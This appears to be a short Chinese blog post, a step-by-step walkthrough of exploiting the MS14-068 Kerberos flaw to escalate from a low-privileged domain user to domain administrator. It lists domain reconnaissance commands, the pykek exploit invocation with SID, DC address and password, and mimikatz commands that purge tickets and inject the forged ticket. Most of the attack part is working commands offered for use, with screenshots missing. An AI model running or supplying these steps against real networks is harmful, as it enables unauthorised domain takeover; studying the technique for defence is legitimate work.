net config workstation 是否存在域环境  
net view作用:显示域列表、计算机列表或指定计算机的共享资源列表     
net time /domain  查询域控完整名和时间
net user /domain 查询域内所有用户
net user chen /domain 查询是否为域管理员   该用户域的组   Domain Admins组       
whoami /user   查询域用户sid  域控给不同计算机不同的sid
ip查询:入侵ip,域服务器ip(53端口,389端口)
systeminfo | findstr  KB3011780

假设已经获得TargetShell,并且在域环境中并未打ms14_068的相关补丁
接下来我们进行利用
通过上篇文章的信息搜集(https://blog.csdn.net/weixin_45682070/article/details/106337762)
首先GitHub上下载ms14_068的利用脚本pykek
python ms14-068.py -u whale@DC.com -s S-1-5-21-2867916317-3317112163-957300651-1113 -d 192.168.17.140 -p @$password123
参数:-u为低域权限用户名@域 -s为sid -d为域ip -p为密码
生成高权限票据 TGT_whale@NoOne.com.ccache
先看一下我们的权限,这里我们是没有权限的
在这里插入图片描述
然后
在这里插入图片描述
mimikatz.exe
kerberos::list #列出内存中的票据信息
kerberos::purge #清除内存中的票据信息
kerberos::ptc TGT_whale@NoOne.com.ccache(生成的高权限票据全名) #导入高权限票据到内存,获得域管理员权限
会后查询域名
在这里插入图片描述
最后查询我们利用ms14_068获取的权限
在这里插入图片描述
至此ms14_068利用完成

posted on 2022-09-13 18:14  noone52  阅读(16)  评论(0编辑  收藏  举报